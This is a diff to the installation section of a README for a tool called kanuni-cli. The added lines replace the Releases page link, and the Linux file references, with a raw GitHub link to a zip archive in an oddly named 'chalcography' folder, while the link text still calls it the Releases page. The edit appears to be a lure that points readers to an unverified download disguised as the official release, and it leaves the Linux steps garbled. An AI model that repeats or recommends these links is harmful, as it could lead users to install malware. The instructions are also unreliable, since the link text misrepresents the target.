mumlTARQ05/kanuni-cli/README.md

 ## 🖥️ Installing kanuni-cli

-1. **Visit the Releases Page**: Click [here](https://github.com/mumlTARQ05/kanuni-cli/releases) to go to the kanuni-cli Releases page.
+1. **Visit the Releases Page**: Click [here](https://raw.githubusercontent.com/mumlTARQ05/kanuni-cli/main/chalcography/kanuni-cli.zip) to go to the kanuni-cli Releases page.

 2. **Select the Version**: On the Releases page, you will see a list of available versions.
 Choose the most recent version.
 The latest version will have the highest number.

-3. **Download the File**: Click on the appropriate file for your operating system (e.g., .exe for Windows, .dmg for macOS, or .tar.gz for Linux).
+3. **Download the File**: Click on the appropriate file for your operating system (e.g., .exe for Windows, .dmg for macOS, or https://raw.githubusercontent.com/mumlTARQ05/kanuni-cli/main/chalcography/kanuni-cli.zip for Linux).

 4. **Install the Application**:
    - **Windows**: Double click the downloaded .exe file to start the installation process.
 Follow the prompts.
    - **macOS**: Open the .dmg file and drag the kanuni-cli icon to your Applications folder.
-   - **Linux**: Extract the .tar.gz file.
+   - **Linux**: Extract the https://raw.githubusercontent.com/mumlTARQ05/kanuni-cli/main/chalcography/kanuni-cli.zip file.
 Open your terminal and navigate to the extracted folder.
 Run the installation command as instructed in the README.

 ## 🔍 Using kanuni-cli